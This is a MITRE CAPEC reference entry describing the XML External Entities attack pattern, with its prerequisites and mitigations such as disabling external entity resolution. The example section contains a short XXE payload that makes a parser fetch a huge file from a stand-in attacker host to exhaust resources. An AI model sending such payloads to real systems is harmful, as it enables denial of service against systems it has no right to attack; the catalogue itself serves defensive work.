Home > CAPEC List > CAPEC-221: XML External Entities (Version 2.9)  

CAPEC-221: XML External Entities

 
XML External Entities
Definition in a New Window Definition in a New Window
Attack Pattern ID: 221
Abstraction: Standard
Status: Draft
Completeness: Stub
Presentation Filter:
+ Summary

This attack takes advantage of the entity replacement property of XML where the value of the replacement is a URI. A well-crafted XML document could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.

+ Attack Prerequisites
  • A server that has an implementation that accepts entities containing URI values.

+ Examples-Instances

Description

In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.

<?xml version="1.0"?>
< !DOCTYPE bomb [
<!ENTITY detonate SYSTEM "http://www.malicious-badguy.com/myhugefile.exe">
]>
<bomb>&detonate;</bomb>
+ Solutions and Mitigations

This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.

+ Content History
Submissions
SubmitterOrganizationDateSource
CAPEC Content TeamThe MITRE Corporation2014-06-23Internal_CAPEC_Team

More information is available — Please select a different filter.
Page Last Updated or Reviewed: December 07, 2015